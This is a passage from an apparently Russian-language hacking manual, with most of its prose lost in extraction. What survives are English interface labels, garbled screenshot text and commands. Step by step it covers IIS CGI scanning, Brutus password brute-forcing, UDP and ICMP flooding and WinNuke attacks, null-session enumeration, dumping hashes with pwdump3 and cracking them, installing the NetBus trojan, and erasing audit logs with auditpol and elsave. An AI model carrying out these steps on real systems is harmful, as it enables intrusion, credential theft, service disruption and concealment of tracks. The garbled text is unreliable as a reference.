,
D@MNED CGI Scanner 2.1 (177 exploits)
, ,

\>
. - , - , ,
Web, -
.
, ,
CGI-, , READY
Web-, Puc. 8.6. CGl-
D@MNED CGI Scanner 2.1

.
CGI-
D@MNED
CGI
Scanner
2.1
(http://shieldandsword.narod.ru/soft/scansec/
scansec.htm). . 8.6 ,
.
, D@MNED CGI Scanner 2.1.
Scanners log ( )
. , , , .
Scan list ( ), . 8.7, , .
,
, .
-
126
Web-
. , ,
.
, .
Scan subnet ( ) -, . , : 234.56.78.1 - 8.
CGI holes ( CGI) (. 8.8) CGI-,
.
, ,
,
Scan list ( ).
1 g UttiMNtO CGI
.1 (177 exploits)
. 8.8.
CGI-
. 8.7.

2
D Use proxy
|
:
. 8.9. CGl-
!
English
. 8.10. CGl-

127

Spy () (. 8.9),
Web- ( - IIS 5.0),
( ).
Option (), . 8.10,
-, . - -
- -,
- ( , ...).
D@MNED CGI Scanner 2.1 .
1-1
IP- 1.0.0.7, .
> Scan list ( )
http://www.altavista.com IP- 1.0.0.7.
> Scanner log ( ) . ,
. 8.11.
.
( . 8.11 200
500) ;
. ,
200
- , 500 - .

200 (
- SUCCESS)
.
' D@MNED CGI Sea
2 1 (177 exploits)
Scanner log]|scan list]|CGl holas|| Spy || Options [| About..
1:0,0.7/
1.0.fl,7/_v
1.0.0.7/ils
1,0,0,7/it
I.U.0.7.
1.0,0.7.
,s]f-
0,7/
1.0.0.7/ib
1.0.0.7/!
to:o.7/i
1.0,0,7/i
" -.0.7/1
,0,7/ilssam
.0.7/msai
>.SS )
3 ]
- 5(
. 8.11.
,
IIS 5.0
D@MNED CGI Scanner 2.1
.
, , .
, 1, , MITRE CVE (http://www.mitre.org). ,
. 8.11, IIS .htr .idq.; MITRE.
CVE-2001-0500
128
Web-
Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary
commands via a long argument to Internet Data Administration (.ida) and
Internet Data Query (.idq) files such as default.ida, as commonly exploited by
Code Red.
( ISAPI (idq.dll) Index Server 2.0 Indexing Service 2000 IIS 6.0 -
.ida (Internet Data Administration -
) .idq (Internet Data Query - ),
, default.ida, Code Red.)
Reference: BUGTRAQ:20010618 All versions of Microsoft Internet Information
Services, Remote buffer overflow (SYSTEM Level Access)
Reference: MS:MS01-033
Reference: CERT:CA-2001-13
Reference: BID:2880
Reference: XF:iis-isapi-idq-bo(6705)
Reference: CIAC:L-098
, CGI- IIS
- IIS. , ,
http://www.securitylab.ru. ,
, .
" IIS .htr
, Web . "" , .htr (ISM.DLL).
IIS 4.0 5.0 SP2 1 2002.
IIS - , , . ISAPI , .htr , ISM.DLL.
ISM.DLL . IWAM_COMPUTERNAME.
. IIS 4.0-5.1."
129
5 - 5830

, SecurityLab.ru Unix Pyton, . ,
, ( ,
).
CGI Vulnerability Scan (http://www.wangproducts.co.uk),
. 8.12.
aglimpse
Anyform2
args.bat
args.cmd
AT-admin
Auth
bnbform.cgi
bsguest.cgi
bslist.cgi
calender.pl
campas
carbo.dll
CGI Counter
CGImail.exe
cgiwrap
classifieds.cgi
+ Deselect All
Scan All
-/
Scan Selected Stop Scanning
& Save Results
<a
f Clear Log
Proxy Setup
&
Ex*
Idle...
Puc. 8.12. CGI Vulnerability Scan

CGI-, , - .
, , SecurityLab.ru
(http://www.securitylab.ru), IIS ( ),
IIS.
, , HTTP - . -

Web-? - HTML- Web-, . HTML,
Web, HTML .
Web . , , Teleport Pro (http://www.ten-max.com),
130
Web-
Web .
Teleport Pro.
Web'cnsuc)ep*feLeport fro
Teleport Pro Web-, Web- . Teleport Pro , ( ), , Web Web-.
, ,
- spider - .
Web-
Web - . , , , . Teleport Pro .
Web-
.
Web-, .
Web- .
Web-.
Web-, Web-.
Web- .
Web-.
Teleport Pro , Web ,
.
Teleport Pro , , Web.
, , Web.
Start () - , Teleport Pro ,
131

Web, Web-, , .

Web
. , Teleport Pro Web
, .
Web- , Web, .
Teleport Pro . 8.13.
. 8.13. Teleport Pro Windows

Teleport Pro
,
.

.
> Teleport Pro File New Project Wizard
( ). (. 8.14).
. 8.14
Teleport Pro.
Create a browsable copy of website on my hard drive - Web- .
132
Web-
Welcome to the New Project Wizard!

The New Project Wizard makes it easy for you to setup and
run aTeleportPro project.
What do you want Teleport Pro to do?
0 Create a browsable copy of a website on my hard drive
Duplicate awebsite, including directory structure
Search a website for files of a certain type
Explore every site linked from a central site
Retrieve one or more files at known addresses
Search awebsite torkeywords
I
. 8.14.
Teleport Pro
Duplicate a website, including directory structure - Web-,
.
Search a website for files of certain type - Web- .
Explore every site linked from a central site - ,
.
Retrieve one or more files at known addresses -
.
Search a website for keyword - Web- .
Project Wizard - Step 2 of 4
Starting Address
Enter an Internet address to serve es the starting location for
this project. Examples of valid Internet addresses are
"www. micro soft. com", "www.netscape.com/products/", and
"www.ibm.com/home/ind8x.htm".
Mow deeply would you like Teleport to explore?

Up to
|3
~J links from this starting point
(If you want to add more starting addresses to your project

later, use the "New Address" menu command, or press the
"New Address" button on the toolbar.)
I
. 8.15.
Web
133

- Web . , Next
(). (. 8.15).
*
,
. , ,
Teleport Pro 1.29.1959 HTTP FTP.
Web;
, New Address ( )
.
Up to ... links from this starting point ( ...
) Web , ( 3).
Next ()
(. 8.16).
Project Configuration
When dealing the local website, retrieve:
Justtexl
Text end graphics
Text graphics, and sound
<3> Everything
If you need an account and password to access this site, enter

them here.
Puc. 8.16.
. 8.16 , Web
. :
Just text ( ) - .
Text and graphics ( ) -
.
134
Web-
Text, graphics, and sound (, ) , .
Everything () - .
, , Account ( ) , Password
() - .
Next ()
(. 8.17).
Congratulations!
YouVe just created oTeleport Pro project!
When you press Finish, you will be asked to save the project
Choose name for it in the Save dialog box.
Teleport Pro will save the project then create a folder, named
pfier your project in which it will store any retreived files.
Whenyou're readyto run the project pressthe Stari( )
button on the toolbar, or select Start Irom the Project menu.
Puc. 8.17. !
. 8.17 ,
Start ()
Start () Project ().
> Finish () (. 8.18) .
Save in: | Si Teleport results
<
'3 yahoo
yahoo
Filename:
Iklingonj
Save as type:
[Teleport Pro Project C*.tpp)
Puc. 8.18. Teleport Pro

135

Project
Properties ( ), . 8.19
Project * Project Properties ( * ).
Summary | File Retrieval | Browsing/Mirroring | Exploration | Exclusions | Netiquette | Advanced
0 Always save KTML pages
D Re plicate the directory structure of remote servers
El Use MSIE-compatible filenames (appends .htm to HTML files where necessary)
El Localize links far retrieved files

-Links for unretrieved
Link to message that explains why the file was not retrieved
Link to the Internet address for the file
0 Link to a place v*here the local file will be stored
D Link using 0.3 filenames
Relink all files in the project folder now
Cancel
I I
Apply
Puc. 8.19.

Project Properties ( ) , .
, Browsing/Mirroring (/ ), . 8.19.
Browsing/Mirroring (/ )
,
, ,
,
. .
Always save HTML pages ( HTML) Teleport Pro HTML, .. Web-,
, ,
Web, . , Web-
, ,
Web- .htm .html.
Replicate the directory structure of remote servers (
) 136
Web-
, .
,
, .
Use MSIE-compatible filenames (append .htm to HTML files where
necessary) ( , MSEE (
.htm HTML)) IE ,
HTML, .htm .html (, .shtml .pi). ,
, Teleport Pro
HTML, .htm .html,
.
Linkage System ( ) , , ,
. Localize links for all retrieved files
( ) ,
, Web.
:
Link to a message that explains why the file was not retrieved -
, , . , ,
, .
Link to the Internet address for the file - .
,
.
Link to a place where the local file will be stored - ,
, ..
Web .
Web- , .
Teleport Pro
HTML- , , , , Java, . , -
.
137

Linkage System (
) Link using 8.3 filenames (, 8.3) , DOS . , ,
8.3.
Relink all files in the project now ( )
HTML
, .

, , , Web-. HTML
Web-? , Web- , ,
Web-. , Web* HTML.
?
-, - ,
. , , , - ,
. , - .
-, - , , - , , . , , , Web-
CGI. HTML CGI-,
.

, . ,
. , -
.
, ,
, , Web , ,
Retina (http://www.eeye.com/html/Products/Retina/). ,
Teleport Pro (http://www.tenmax.com) 138
Web-
HTML-
, Web.

, Web ? ,
Web, ,
- . HTML, HTTP.
, , .
Web-,
.
- ,
Web- ,
/ Administrator/password
( , , [3] , (!!!)
Web).
, , Brutus Authentication Engine Test 2 ( 2), Brutus AET2 (http://www.hobie.net/brutus), , .
, HTTP.
. 8.20 Brutus.
Taigel |1.0.0.1
Type|HTTP[BasioAuth) |-| | Start [ Slop | Ctear |
rConnection Options
Port I S ) I
Use Proxy I Define I
10 Tmeout
Connections
TIP (Basic) Option!

Method
[HEAD
-eepAlive
:ion Option*
0 Use Username
0 Single User
Positive Authentication ResuUs

I Username
I Type
HTTPlBasicAuth)
Administrator
Timeout
991
Âdministrator R009
Reject
I Password
AuthS
Thre*
\\es Attempts per second
. 8.20. Web-
139

IIS
Sword-2000, .
> Target () IP- , 1.0.0.1.
> ()
, . HTTP (Basic
Authentication) (HTTP ( )) -
HTTP, ( IIS
Windows IIS).
Authentication Options ( ) , . Administrator,
Use Username ( ),
Single User ( ).
> Pass Mode ( ) Brute
Force ( ), , .. .
> Range (). Brutus - Brute Force Generation (Brutus - ), . 8.21.
Brutus - Brute Force Generation Brutus - Brute Force Generation
Q
(Brutus -
Min Length |0 |" Digits only
) - - Lowercase Alpha]
Length | [-
, Uppercase Alpha
|
OK
| Cancel
IIS - Mixed Alpha
Alphanumeric
. Full Keyspoce
;
Custom Range |e7aoinsmldcumfpg^bvfcxjqzl 234567890 \
Min Length (
), Max Length ( Puc. 8.21.
) - 3.
, Digits only ( ).
.
> Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.
140
Web-
^^^^11 X Brutus - AET2 - www.hoobie.net/brulu: - (January 2000)
File
Tool
Target |1. 0.0.1

.
I
1
Port 1 30
Method
(HEAD
PI
Type I HTTP (Basic Auth] |-| | Start
10 Timeout
Connections ^
'
0 Use Username
U sell D
Help
10
Stop | Clear
Use Proxy [ Define |
0 KeepAlive
Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |
0 Single Usei
[Administrator
|Biw*|
Fife
lwrdi.txt
|||

Target
1.0.0.1/
1 Type
1 Username
HTTP (Basic Auth)
Administrator
1 Password
007
Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts)
Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992
^* ** ** ^ ^.
992
||U:Adrniriistrator P:000
||58 Attempts per second
||ldle
/f
Puc. 8.22. IIS !

, IIS , . 8.23, ,
.
Puc. 8.23. Web

, Brutus , Web. CGI- Web-. () HTTP
(Form) (HTTP ()) GET ,
141

, ,
, .
Web, , - . Web
, . , , . , Windows NT/95/98,
Web- CGI Vulnerability
Scan D@MNED CGI Scanner 2.1, ,
, Web, ,
.
, Web-, , ,
. Web - ,
Web- .
, Web- - , Retina, , , [7]. Web- -
, .
142
9.
UoS
, TCP/IP, TCP/IP , . , , - ,

DoS (Denial of Service ). DoS -, TCP/IP .
DoS , . DoS ,
, Yahoo, eBay, CNN.com, www.Microsoft.com,
, [3].
,
- , , , .
DoS ,
,
, , .
, [3], DoS
, . , , , , DoS Web-; , DoS
. ,
, - , DoS.
,
DoS ,
. DoS , ,
,
, - - IDS (, BlacklCE Defender
(http://blackice.iss.net/)), .

DoS,
, .
'
DoS ,
.
, , DoS .
- ,
, , ( Web- Yahoo).
. , , 1 ( 1544 /), , , 56 / ( ).
- ,
, , .

.
- ,
.
- , ,
.
- , .
,
.
- ,

, .
.
DoS , , .
144
DoS

,
. 1, Web- [3], , . ,
, .
, . , - UDP ICMP.
DoS, , ,
/.
.
, UDP
UDP, . , DoS, UDP Flooder 2.0
Foundstone (http://www.foundstone.com), , - , .
. 9.1 UDP Flooder 2.O.
UDP Flooder 2.0,
DoS 1-3
IP- 1.0.0.5 .
> UDP Flooder 2.O.
IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5.
> Port () , 80, HTTP-.
145

UDP Flondfir 2
IP: 1.0.0.1
^ __. 11011
.
IP/hostname |1. 0.0.5
Max duration (sees)
Port [30
II
Înfinite] |
Max packets [[Infinite]
min
max
Speed (pkts/sec)
[-[
| 250 |
~"V
Modem > Cable > Tl > LAN
Random
Text
[20000 | to [30000 | bytes
|"' UDFFlocH! Server eH'iste
From file | Brows 1 1
|
| Go
Packets sent
903
Seconds elapsed
20.299
Stop
Puc. 9.1. UDP

Speed () LAN, .
Data ()
Random ( ),
Windows Task Manager
- File
Opliont View Help

Applications | Processes J Performance | Nettviîng [
.
Sword
>
, ,
20 000 30 000, .
> Go ().
> ,
,
Stop ().
. 9.2

Alex-
, Networking ().
146
Adapter Name
[[Processes: 39
I Network Utilization I
||CPU Usage: 22%
Link Speed I
10 Mbps
Operatic
[[Commit Charge: 150620K / 47864 J
Puc. 9.2.
80%
DoS
, -
UDP, 50%
. - ,
LAN Ethernet I DBase.
4>) ICMP
( ) ICMP (Internet Control Message Protocol -
)
UDP. . 9.3 X-Script ICMP
Bomber.
pt ICMP Bomber vO 3 By Code
Host |1.0.0.5
Packet Size: h ooOOO
\ NumberToSenchhooo
Received 34464 bytes from 1.0.0.5 in 60 msecs

. 9.. X-Script ICMP Bomber ,

, Host
() IP- ,
Ping (). , Packet Size ( )
, Number to Send ( ) .
-
. . 9.4 ,
Alex- ( IP-
, , 1.0.0.5).
ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP
. ICMP
,
Web-; ICMP .
147
" Windows Task Managei

File
Options
View
Help
Applications I Processes I Performance I Networking
Processes: 38
||CPU Usage: 5%
\\Commb Charge: 1417 / 47864 ^
Puc. 9.4. DoS !
Aht3K3 Smurf
, , ,
DoS ? Smurf, .
, , Smurf
. ECHO () ICMP,
. IP- ,
. , , -
10 , .
, DoS, DDoS (Distributed DoS). DDoS -, .
, ,
148
DoS
DoS . DDoS WinTrinoo (
http://www.bindview.com), , , DDoS Win32. 2000 DDoS
, Web- (, , , WinTrinoo).
- Foundstone , ,
DoS.

DoS, , , , , . , , DoS,

,
. , .
DoS
PortFuck, ( TCP- , ). PortFuck - TCP- , . ,
,
, TCP- ,
, , .
. 9.5 PortFuck.
!.f: PortFuck 1.02 PRIVATE BUILD
Host: localhost
START
Help?
Port:
Reconnect on Disconnect
Delay (MS): |1 000
[Ready.
NICI
PA
Socks: [5
Puc. 9.5. PortFuck

149
Nuke
Nuke ,
DoS, , , -, .
- , . TCP/IP
ICMP, ICMP .
- -
, .. - ICMP, , ,
. ,
.
- - ,
, , ,
.
Web-, , . Nuke -
.
DoS Nuke , ,
Windows 2000/XP ,
Windows 9x.
Windows 2000/XP,
(, [4]). ,
Windows 9x,
, .
,

.
Nuke - , . ,
Windows Nuke'eM version 1.1, . 9.8.
Nuke , - Alex-2, IP- 1.0.0.4
Windows 95. .
> Address () Windows Nuke'eM version 1.1,
. 9.8, IP-
Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000).
- Add ()
.
152
DoS
\"\ Eort [
Address [1.0,0,7
1.0.0.4
1.0.0.5
1.0.0.7
lext [Testing 1 2 3
JDelay
ft
[-^ dose after execulio
This program is created by Sadikuz (c) for

test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|
Add
| |Remove! |
Help
Execute
Dong
Puc. 9.8.
>
Execute (). Windows Nuke'eM version 1.1

(. 9.9).
Windows Nuke'eM - Version 1 . 1

Rle
Help
Address |1. 0.0.7
MEot|l39
1.0.0.4 {Nuked}
1.0.0.5 {Connect error}
1.0.0.7 {Connect error}
lexl |Testing 1 2 3
Delay |o
|
^ Q Close after execution
This program is created by Sadikuz (c) for

test-purposes only. The author of this
program
is not responsible for any misbehaviour by
|
Add
| | Remove | |
Help
| 1
Execute
Unable to connect to: 1 .0.0.7
Puc. 9.9. Alex-2 !

> Alex-2, 1-2 Windows.
Windows , . 9.10.
, 1-2 - Nuke. ,
IRC- IP-.
Windows , , , IDS ( BlacklCE Defender).
153

- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.

DoS - ,
. ,
, , . , [11] , , DoS, , , Web- .
, Web-. - , DoS.
DDoS - , , , , ,
156
DoS
-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir),
http://www.foundstone.com DDoSPing 2.0,
-. ,
UDP, UDP .
. 9.11 DDosPing 2.0, .
-Target IP address range Start IP address
|1.Q.Q.5|
End IP address
h.OO 5
Slop
-Transmission speed control-
-o-
Speed (pkts/sec)
I 181
Modem>-Cable>T1 >LAN
-Infected Hosts-
Program started: Sun Febl613:50:48 2003

Waiting 6 seconds for final results...
Program stopped: Sun Feb1613:50:54 2003
- Status Current IP
Packets sent
Time elapsed
Zombies detected
ne /,
1.0.0.5
3
00:00:00
0
Save List
Configuration
Affp://i
. 9.11. DDoS

DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
-) IP- .
157

> Speed () , , LAN.
> , Configuration () . 9.12).
Enable
Send to UDP port
[34555
"Ping" command
|pngQ..KsH4
Expected reply
(PONG
Windows defaults
|
UNIX defaults
Listen on UDP port |3555
I
i
0 Enable
SendlCMPID
[668
"Ping" commend
Jgesundheit!
Expected reply
|sicken\n
P^ceivelCMPID [69
I
I
0 Enable
SendlCMPID
"Ping" command
[?89
Receive ICMP ID [
~ """"
Show UDP transmit errors
Max run duration (sees)
[O
Transmit each packet
After scon ends, wait
Cancel
I (Qforev@r)
times
| OK
sees for final rep lies
'
. 9.12.
> , Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
> , DDoSPing 2.0 , WinTrinoo, ,
- StachelDraht Tribe Flood Network. ,
(. 9.12).
> DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ).
, -
Zombie Zapper (http://razor.bindview.com/tools/
ZombieZapper__form.shtml), WinTrinoo.
. 9.13 , , ,
DDoSPing 2.O.
158
DoS
Target(s)
0 Specify single IP or class subnet
Target IP:
| input IMs...
0 Trinoo
UDP source
|53
0 Trinoo for Windows

0TFN
0 Sta.chelDroht
QShatt-myfloodedhost:
[ T o I Repeats (1-300)
Zap
Exit
Puc. 9.13. Zombie Zapper

DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.
, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
EDS DP-, , , ,
Web. , - , .
DoS , -
- !
159
10.
Windows ZOOO/Xf
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?

TCP/IP, . TCP/IP . .
1 ,

. - , , [11].
, , , .
1, ,
- .
cemu*TCf/lf
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
- ICMP (Internet Control Message Protocol -
). . . 10.1 ping Sword-2000.
Windows 2000/XP
\ Command Prompt
Pinging 1.Q.O.I with 32 bytes of data:

Reply
Reply
Reply
Reply
fron
fron
fron
fron
1.0.0.1:
1.0.0.1:
1.0.0.1:
1.0.0.1:
bytes=32
bytes=32
bytes=32
bytes=32
tine<lns
tine<lns
time<lns
time<lns
TIL=128
TTL=128
TTL=128
TTL-128
Ping statistics for 1.0.0.1:

Packets: Sent = 4, Received 4, Lost = 0 3x loss),
ftpproxinate round trip times in nilli-seconds:
Mininun = Qns, tlaxinun = Ons, flverage = Ons
Puc. 10.1. Sword-2000 ping

,
. ,
, ,
ICMP
. ICMP , , , hping (http://www.hping.org/).
(.. ) ICMP,
,
.
Resolved |SWORD-20]0
Resolve hostnames
0 Only scan responsrve ping
0 Show host responses
Ping only
Every port in list
0 Ignore IP zero
0 Ignore IP 255
Extract from file
All selected ports in list

All list ports from
All ports from
M Active ho
Open ports
Puc. 10.2. SuperScan 3.0
161
6 - 5830

- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 10.2).
. 10.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .

, , , . Windows NT/2000/XP -
NetBIOS 139.
&

Windows NT/2000, .
. Windows NT/2000/XP
.
net use\\1.0.0.1\IPC$ "" /user: ""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication -
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
162
Windows 2000/XP
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .

Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain
SWORD
.
SWORD. , .
C:\>net view /domain:SWORD

\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 10.3.
. 10.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1 >
SWORD.
163

Command Prompt
C:4Documents and SettingsSfllex>nbtstat - 1..0.1
Node Ipflddress: [1.0.0.5] Scope Id: U

NetBIOS Remote Machine Nane Table
SllORD-2000
<00>
SUORD-2000
<20>
SUORD
<Q0>
SWORD
<1C>
SWORD
<1B>
SWORD
<1E>
SUORD-2000
<03>
SUORD
<1D>
MSBROWSE
<01>
INet~Seruices <1C>
IS~SWORD-2Q00..<00>
ADMINISTRATOR <03>
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
GROUP
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
UNIQUE
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
flddress - S2-54-AB-14-5S-B4
Puc. 10.3. nbtstat

Alex-3
, , - Administrator. Sword-2000 ? net view,
. . 10.4.
C:\Document;
id Settings\fllex>nbtst
Sviord:
Node Ipflddress: 11..0.5] Scope Id: I I
NetBIOS Remote Machine Nane Table
SUORD-20QQ
SUORD-2Q00
SUORD
SUORD
SUORD
SUORD
SWORD-20QGI
SUORD
MSBROUSE_
INef"Seruices
IS-SUORD-2000.
flDMINISlllfllOR
Registered
Registered
Registered
Registered
Registered
Registered
Registere
Registerei
Registered
Registered
52-54-flB-14-S5-B4
Puc. 10.4. Sword-2000

, Administrator
Sword-2000 CD-ROM. , -
NetBIOS, Administrator,
7, 9, 13, 17, 139, 443, 1025, 1027 , :.
Administrator - : .
164
Windows 2000/XP
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS TCP/IP
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11].
, , ,
.

Windows NT/2000/XP .
, .
,
, , .
- , ..

, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:\>net use \\1.0.0.1\1$ * /u:Administrator
* ,
IPC$ Administrator.
:
Type password for \\1.0.0.1\IPC$:
. ,
- 165

, , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, , , .
Windows NT/2000/XP , SAM (Security Account Manager - ). SAM
(, , ) ,
, ,
. ,
- , , , , .
,
SAM, LC4 ( LOphtcrack,
- LC4) (http://www.atstake.com/research/redirect.html), .
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 2).
Pwdump2 - , Syskey.
.
Pwdump3 - , Pwdump2, .
Syskey, 2; ,
SAM,
Windows 2000/XP , Windows NT
.
2 , , , .
Sword-2000
PwdimpS, :
C:\>pwdump3 sword-2000 > password.psw
166
Windows 2000/XP
Sword-2000,
password.psw.

(Notepad) (. 10.5).
sword.psw - Notepad
File
Edit
Format
Help
\dministator: SOO:7A01665EB2B6C14AAD3B435B51404EE:OB0412D8761239A73143EFAE928E9FO
A:::
Guest:501 :NO PASSWORD*"'
:NO PASSWORD
*
:::
krbtgt:S02:NO PASSWORD
'
:7BD70B6AF1C3909E006426SFE207B256:::
Alex:1110:7A01665EB2EB6C14MD3B43SB51404EE:OB0412D8761239A73143EFAE92eE9FOA;::
Alex-1:1113:7A01665EB2EB6C1<tAAD3B<!35BSl404EE:OB0412D6761239A73143EFAE92SE9FOA:::
TslnternelUssr: 1114:BAD7DFC9A31GED47F7B4B3B5S224FE93:C 7BD9SEOEBB6 EFS1646447
5CFO:::
USR_SWORD-2000:inS:3C28F57EAAF6DF9E1A6F22062Ali83BE:6FDDA84130F3FOS7F762F24l4IM
B235686:::
WAM SWORD-2000:1116:ED30C29CC83326F4A5CF20S94A603490:CA9469SBOCF3440C09302SC !
B028B6E2C:::
SWORD.2000J:100S:NO
'AS5WORD""""""""":3942CE20E6A112963BAeF7DC9BC34D07:::
ALEX-3$:1109:NO PASSWORD""
"""""":B6B19C13A34F6BD42S4C0199ES1F12A6:::
ALEX-1$:1112:NO PASSWORD'""
"
:B7D4SA21709B0869751E609477D7266F:::
Puc. 10.5.
Sword-2000
, password.psw Administrator,
. , LC4, , ,
Sword-2000 (. 10.6).
Administrator
Guest
krbtgt
Alex
Alex-1
TslnternetUser
IUSR_SWORD-2.
IWAM_SWORD-2.
SWORD-2000S
ALEX-3S
ALEX-IS
missing
* missing *
* missing *
Dictionary 1 of! l\\Alex-3X5)stake\LC4\words-enqlish.dic]
Puc. 10.6. ,
Sword-2000
Celeron 1000 , 007
. 167

,
LC4.
, , -
NetBIOS - , , .
, .

, - ,
, . -
, .
- ,
. , .
Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),
3 . IKS -
,
.
- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).
168
Windows 2000/XP
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . 1% NB Server [Off] 1
NetBus
: -
Sword-2000 (- 1.0.0.1), -
Alex-3 (IP- 1.0.0.5).
.
NetBus
, NBSvr (
).
NBSvr , . 10.7.
|[ Settings
HI
i| |
Close
l> />
Puc. 10.7.
NetBus
NetBus NBSvr .
.
> NB Server ( NB) Settings ().
Server Setup ( ), . 10.8.
Server setup
Accept cor
Run on port:
|4
Password:
1 \r
Visibility of st rver:
JsO
1 Fully visible
Access mod :
[Full access
0 Autostart every Windows session

0 Log communication
OK
Cancel
Puc. 10.8. NetBus

>
Accept connections ( ).
169

> Password () NetBus.
> Visibility of server ( )
Full visible ( ),
NetBus ( ).
> Access mode ( ) Full access ( ), Sword-2000 .
> Autostart every Windows session ( Windows),
.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 10.9.
. 10.9. NetBus
Host Neighborhood * Local ( *
). Network (), . 10.10.
Microsoft Windows (Microsoft Windows Network)
(. 10.11).
NetBus,
Sword-2000, Add (). Add Host ( ), . 10.12.
170
Windows 2000/XP
Network
Network neighbourhood
Network neighbourhood
Microsoft Windows
Add.,
I [I |_
Add...
Close
. 10.11.

Puc. 10.10.
NetBus
Destination: |Sw6RD-200d
Host name/I P:|1. 0.0.1

TCP-port: |
1
20034|
U set name: [Administrator

Password: p
ft
OK
Cancel
Puc. 10.12. - NetBus

Host ( /IP) IP- 1.0.0.1.
User name ( ) Administrator, Password () -
LC4 007.
. Network ().
Network (), Close ().
NetBus 2.0 Pro
(. 10.13).
Sword-2000,
Sword-2000 Connect ().
NetBus 2.0 Pro Connected to 1.0.0.1 (v.2.0)
( 1.0.0.1 (v.2.0)).
171

KNetBus 2.0 Pro
Destination
ysworaxzcggj
I Host
My computer
Cannot connect to 127.0.0.1
Puc. 10.13. NetBus 2.0 Pro - NetBus

NetBus , NetBus,
. ,
Administrator. . 10.14 NetBus, Control ().
Message managei
DesUnatiorldJ File manager
ISWORI
Window managei
My con $r Registry manager
0.0.1
'7.0.0.1
Si Sound system
^J Plugin managei
Port redirect
(f* Application redirect
Remote control
[f^-j File actions
V Spy functions
Cannot conne
Enil Windows
Puc. 10.14. Control

, Spy functions
( ) , , , , . ,
, ,
, .
172
Windows 2000/XP
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 8), ,
. (
).

, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpol>auditpol \\sword-2000 /disable
:
RunningAudit information changed successfully on \\sword-2000...
New audit policy on \\sword-2000...
(0) Audit Disabled
System
= No
Logon
= No
Object Access
= No
Privilege Use
= No
Process Tracking
= Success and Failure
Policy Change
= No
Account Management
= No
Directory Service Access
= No
Account Logon
= No
173

\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.

Windows 2000/XP,
( , ).
.
> (Start)
(Settings * Control Panel).
>
(Administrative Tools).
>
(Computer Management). .
>
# (System Tools * Event Viewer).
> (Security Log);

.
> (Clear all
Events). (Event Viewer)
.
> (No), . .
. , -
! , -
. ,
.
[3] elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).
Windows NT 4, 174
Windows 2000/XP
Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
).
, -
elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. .

.
- .
, , ,
. Windows
( , , , [7]). Windows, IDS.

, IDS, , IP-
(, BlacklCE Defender). , ,
, -
..
175
11.

, , . , ,
, (
, ), - , , . ,
- .
- , , .

, ,
, - ,
. -- -
- , ! , , - , , .
, , . , , - , ,
, .
- , -
Login Hacker, , THN-Scan (http://www.infowar.co.uk/thc/) ToneLock
Minor Threat&Mucho Maas.
, DOS,
.
, (
) - PhoneSweep
(http://www.sandstorm.com) Sandstorm. ,
, ,

, . PhoneSweep,
- , Sandstorm.
- PhoneSweep , , .
, PhoneSweep, , , , - , . , , , ,
, , ,
. - , , ,
.

- , . , ,
. , . Whols (, http://www.ripe.net). Whols , , , - .
- -
.
, ,
.
,
, . , ,
- ,
, .
- -
177

